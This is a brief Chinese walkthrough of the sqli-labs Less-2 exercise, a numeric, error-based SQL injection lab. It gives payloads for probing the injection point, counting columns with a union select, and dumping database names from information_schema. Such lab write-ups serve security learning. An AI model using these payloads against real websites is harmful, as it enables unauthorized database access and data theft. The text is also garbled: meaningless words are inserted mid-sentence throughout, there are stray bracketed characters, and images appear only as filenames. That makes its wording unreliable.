Less-2 GET-Error based-Intiger based
圖片0.png
1.試探驶赏,判斷注入類型
輸入id=1'
圖片1.png
根據(jù)回顯
near '' LIMIT 0,1' at line 1
煤惩,判斷是個(gè)數(shù)字型注入戳粒。可以成功注入的有:
2.判斷字段數(shù)量
?id=-1 union select 1,2…… --+
通過(guò)增加select后面的數(shù)字個(gè)數(shù)苦丁,判斷字段數(shù)量昭卓。若數(shù)量不對(duì)黍特,返回:
圖片2.png
知道頁(yè)面顯示正常笨枯,這里字段數(shù)是3薪丁,卻能顯示的是第2,3字段。
圖片2-2.png
3.數(shù)據(jù)庫(kù)
?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata --+
圖3
后續(xù)部分同 Less-1馅精,沒有差別严嗜。